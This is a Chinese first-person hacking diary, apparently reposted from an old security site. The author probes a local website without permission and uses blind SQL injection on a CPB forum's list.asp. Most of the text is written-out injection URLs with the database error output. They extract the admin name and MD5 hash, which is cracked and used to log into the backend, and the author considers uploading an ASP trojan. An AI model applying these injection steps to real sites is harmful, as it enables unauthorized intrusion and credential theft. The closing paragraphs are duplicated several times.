昨晚又通宵了一晚,今天睡了一天,醒來時郁悶悶的。。。。。。,心煩!已經全然沒有了學習的興趣~登陸QQ看看,好友全不在線。無聊信手亂開網頁,來到本地一個比較有名的網站,看了看,比上次來時多加了些新東西。反正沒事做,就檢測一下這個站的安全性吧。(我不是黑客,卻有著黑色的信仰,網絡安全永遠是我的愛好!)
在網站轉了一下,看到也有文章系統。不過是HTM的,但用鼠標指向連接,可以看到:
http://xxx.xxx.xxx/0019/open.ASP?id=888&path=wshl&filename&=200381171455.htm
我提交http://xxx.xxx.xxx/0019/open.asp?id=888 and 1=1
跳回主頁
接著提交http://xxx.xxx.xxx/0019/open.asp?id=888 and 1=2
跳回主頁
看來是不能利用了。:(
接著,用XSCAN掃了下端口和CGI,IIS漏洞
打開CMD命令提示符窗口,輸入PING XXX.XXX.XXX(XXX為網址),從返回信息得到IP-----SSS。SSS。SSS。SSS
暈,開了很多端口,給我的第一印象就是-----這站夠垃圾~
看主機開的那些端口,和我機子上WIN2000SERVER默認開的端口差不多,估計是WIN2000SERVER版。
我菜,找了幾個比較熟悉的試了一下,21,80,135,139。
21端口,我試著掃了下FTP弱口令和是否支持匿名登陸。失敗~~~~:(
139端口,試著掃了IPC弱口令,(如果被我掃出有弱口令,那這服務器也太。。。。。。··##%¥#—,哈哈),並且用NET VIEW看了下有沒有共享。失敗~~~~:(
80端口,我先在CMD命令提示符下:
telnet sss.sss.sss.sss 80
get 回車
從返回的信息得知是IIS5。0
可能有WEBDAV溢出漏洞,用WEBDAV溢出程序試了一下,失敗~~~~
135端口,記得這端口可能可以RPC溢出,正好我的機子上有這工具,試了下,失敗~~~~
無奈,又到站上逛了一下,這時,發現一個論壇。點擊進去看了看。
是個CPB論壇,版本1。2,用ASP寫的,以前沒見過。
去Google搜了一下有沒有關於這論壇的漏洞資料,無。。。。。
試著注冊一個用戶,管理員屏蔽了用戶注冊。
下了一個CPB論壇程序,看了看數據庫,ASP的,也不能下載。
看CPB論壇說明得知默認管理員帳號和密碼 admin admin
試試看管理員改了密碼沒,用admin admin登陸,提示登陸失敗。看來管理員改了密碼或刪掉了admin用戶。
不管那麼多了,先進個版塊看看吧,隨手點了個版塊。這是,看到版塊的URL,
http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4
看這個連接可能有SQL漏洞,雖然以前沒有SQL過論壇,還是試了一下。
首先,提交http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 1=1
正常返回
然後,提交http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 1=2
出錯。
看來有SQL漏洞。但此時心中也沒有一點竊喜,根據以前SQL下載系統的經練,僅憑這點,還沒把握拿到密碼。不管那麼多,先試下吧。
接著,看看是否存在ADMIN表,提交http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and exists (select * from admin)
返回的是一個出錯的頁面,提示:
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80004005'
[Microsoft][ODBC Microsoft Access Driver] 操作必須使用一個可更新的查詢。
/bbs/list.asp,行145
這和我以前玩過的不一樣,以前玩的都是正常返回。我隨手在表admin後加了個S,
提交如下: http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and exists (select * from admins)
顯示“該頁無法顯示”
我又試著提交http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and exists (select * from admindfgfdg)
顯示"該頁無法顯示 “
通過這點,我判斷,第一次我提交的應該是成功的,就是說,應該存在ADMIN表。
接著,判斷管理員ADMIN表ID,提交http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and exists (select id from admin where id>1)
顯示"該頁無法顯示 “
看這個返回結果,顯然是不正常的返回,而且ID的值我是從最小的1判斷的,肯定那裡出錯了,具體我也說不清楚,我菜~
接著,我試了下提交http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and exists (select l_id from admin where l_id>1),也就是把ID改成了l_id,這是我以前沒玩過的。
返回的是,出錯。
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e10'
[Microsoft][ODBC Microsoft Access Driver] 參數不足,期待是 1。
/bbs/list.asp,行145
這和判斷是否存在ADMIN表時返回的是一樣的。我竊喜了一下,接著試著提交:
http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and exists (select ls_id from admin where ls_id>1)
顯示“該頁無法顯示"
因此,我斷定ID應該用l_id,可能這對高手來說早就知道了,但這對菜鳥我來說,從沒玩過,哈哈,看來今天就算拿不到密碼也是有收獲的,因為又多了點SQL注入的經練。
之後就是很順利的,提交:http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and exists (select l_id from admin where l_id>5)
返回
錯誤提示:
您是否閱讀了幫助文件,您沒有權限繼續下一步操作,通常是以下原因:
很抱歉,無此論壇!
看來l_id的值小與或等於,提交http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and exists (select l_id from admin where l_id=4)
返回
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e10'
[Microsoft][ODBC Microsoft Access Driver] 參數不足,期待是 1。
/bbs/list.asp,行145
因此判斷l_id的值為4.
接下來猜ADMIN表裡的用戶名長度,提交http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where len(username)>1)
依然從最小的1開始判斷,返回:
錯誤提示:
您是否閱讀了幫助文件,您沒有權限繼續下一步操作,通常是以下原因:
很抱歉,無此論壇!
說明沒有username,試了下
http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 4=(select min(l_id) from admin where len(admin)>1)
根據結果得知存在admin,接著提交http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where len(admin)=5)
返回的信息說明admin長度為5。
接著猜用戶名,根據剛才看到的CPB論壇默認管理員帳號admin,一次提交:
http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where left(admin,5)='admin')
呵呵,成功。減少了不少麻煩。
接下來猜密碼長度,提交http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where len(passWord)>1)
返回
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80004005'
[Microsoft][ODBC Microsoft Access Driver] 操作必須使用一個可更新的查詢。
/bbs/list.asp,行145
哈哈,看來有password,接下來猜長度,提交
http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where len(password)>8
返回
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80004005'
[Microsoft][ODBC Microsoft Access Driver] 操作必須使用一個可更新的查詢。
/bbs/list.asp,行145
說明密碼大於8。
然後提交:
http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where len(password)>10
返回和上面一樣,這時,根據經練,有種不祥的預感,密碼用MD5加密了的!MD5加密算法不可逆,目前只能暴力破解.
接著提交:
http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where len(password)=16
返回和上面一樣,暈呀~~~~~~~~~~~~~果然是MD5加密過的了。
不管那麼多了,先猜出來吧,說不定也可以象DVBBS6。0那樣可以通過COOK欺騙進入後台管理。
提交:http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where left(password,1)='a')
錯誤。
依次猜:
http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where left(password,1)='b')
錯誤
當試到http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where left(password,1)='e'),
正確,後面猜第2位密碼
http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where left(password,2='6')
第3位:
http://xxx.xxx.xxx.xxx/bbs/list.asp?l_id=4 and 4=(select min(l_id) from admin where left(password,2='f')
花了一點時間,才出MD5加密的密碼為:e6f448a30c41a4ea
抱著試下的心理去網上DOWN了個MD5暴力破解工具,先猜數字,長度選5-6,偶暈~~~~~,1分鐘不到,猜出來,密碼225588,我都不相信,試了下登陸,居然成功。
哈哈,今天運氣真好,要是現在福彩沒關門,我一定去買~~~~~~~~~~
在後台轉了一下,發現可以設置上傳文件類型,偶暈~
如果上傳個ASP木馬,然後。。。。。。。。嘿嘿~~~~~
有可能搞定整個服務器,偶暈~
好了,不要太過分。到此為止。
看了管理員資料,找到QQ,看了不在線,明天再通知他們補上吧。
By BlackFaith
=========================
文章類型:轉載 提交:沙加II 核查:NetDemon
返回
建議您使用IE浏覽器800×600
花了一點時間,才出MD5加密的密碼為:e6f448a30c41a4ea
抱著試下的心理去網上DOWN了個MD5暴力破解工具,先猜數字,長度選5-6,偶暈~~~~~,1分鐘不到,猜出來,密碼225588,我都不相信,試了下登陸,居然成功。
哈哈,今天運氣真好,要是現在福彩沒關門,我一定去買~~~~~~~~~~
在後台轉了一下,發現可以設置上傳文件類型,偶暈~
如果上傳個ASP木馬,然後。。。。。。。。嘿嘿~~~~~
有可能搞定整個服務器,偶暈~
好了,不要太過分。到此為止。
看了管理員資料,找到QQ,看了不在線,明天再通知他們補上吧。
By BlackFaith
=========================
文章類型:轉載 提交:沙加II 核查:NetDemon
返回
建議您使用IE浏覽器800×600
看了管理員資料,找到QQ,看了不在線,明天再通知他們補上吧。
By BlackFaith
=========================
文章類型:轉載 提交:沙加II 核查:NetDemon
返回
建議您使用IE浏覽器800×600